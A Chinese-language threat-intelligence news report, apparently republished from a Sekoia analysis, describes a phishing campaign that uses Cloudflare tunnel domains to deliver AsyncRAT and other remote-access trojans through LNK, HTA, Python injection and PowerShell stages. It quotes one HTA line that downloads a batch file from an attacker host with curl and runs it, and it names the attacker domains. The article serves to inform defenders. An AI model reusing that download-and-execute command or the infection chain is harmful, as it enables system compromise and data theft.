网络安全专家发现一起复杂攻击活动，攻击者利用Cloudflare的隧道基础设施分发多种远程访问木马（RAT）。

该基础设施自2024年2月以来展现出极强的持久性，作为恶意文件和木马的分发平台，使攻击者能够未经授权访问受害者系统。

包括Forcepoint、Fortinet、Orange和Proofpoint在内的安全厂商已记录这一持续性威胁，强调其不断演变的特性以及对全球组织日益增长的影响。

初始感染途径

主要感染途径始于包含恶意附件的钓鱼邮件，这些附件伪装成发票或订单文件。

这类邮件通常制造虚假紧迫感，并可能包含伪造的对话记录和回复以显得真实可信。

附件通常采用"application/windows-library+xml"文件格式，由于相比二进制文件看似无害，经常能绕过电子邮件安全网关。

当用户打开文件时，会建立与托管在Cloudflare隧道基础设施上的远程WebDav资源的连接。

攻击基础设施分析

Sekoia威胁检测与研究（TDR）团队持续监控这一攻击基础设施，内部代号为"Cloudflare隧道基础设施传播多种RAT"。

分析显示，攻击采用复杂的多阶段感染链，运用多种混淆技术规避检测系统。这种复杂性表明，即便在2025年，威胁行为体仍在开发创新方法来绕过现代安全控制措施。

攻击者利用带有"trycloudflare.com"后缀的域名（如"malawi-light-pill-bolt.trycloudflare.com"和"players-time-corresponding-th.trycloudflare.com"等）托管恶意内容。该基础设施最终投放的载荷会在受感染系统上建立持久远程访问，可能导致数据窃取和进一步网络入侵。

感染链技术细节

感染过程始于用户与伪装成PDF文档的LNK文件交互。该快捷方式并非打开合法文档，而是从同一远程服务器执行HTA文件。HTA内容揭示攻击进展：

`Set oShell = CreateObject("WScript.Shell") oShell.Run "cmd. exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat", 0, false self. Close` 

此脚本触发BAT文件安装Python并执行混淆的Python代码，随后将下一阶段载荷注入"notepad.exe"进程。

注入notepad.exe进程（来源：Sekoia）

为实现持久化，恶意软件创建启动项，包含两个VBS文件和另一个放置在Windows启动文件夹中的BAT文件。

最终阶段使用PowerShell反射加载从JPEG图像下载的载荷（内含base64编码的载荷），通过"duckdns.org"等动态DNS服务建立与命令控制服务器的RAT连接。

感染链示意图（来源：Sekoia）

通过涉及Windows-library文件、LNK文件、HTA执行和Python注入的复杂多阶段过程分发AsyncRAT的感染链

该攻击活动的演变表明，威胁行为体持续调整技术以绕过安全控制，凸显了采用多层检测方法和持续监控类似攻击模式的重要性。

参考来源：

Hackers Abuse Cloudflare Tunnel Infrastructure to Deliver Multiple RATs

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）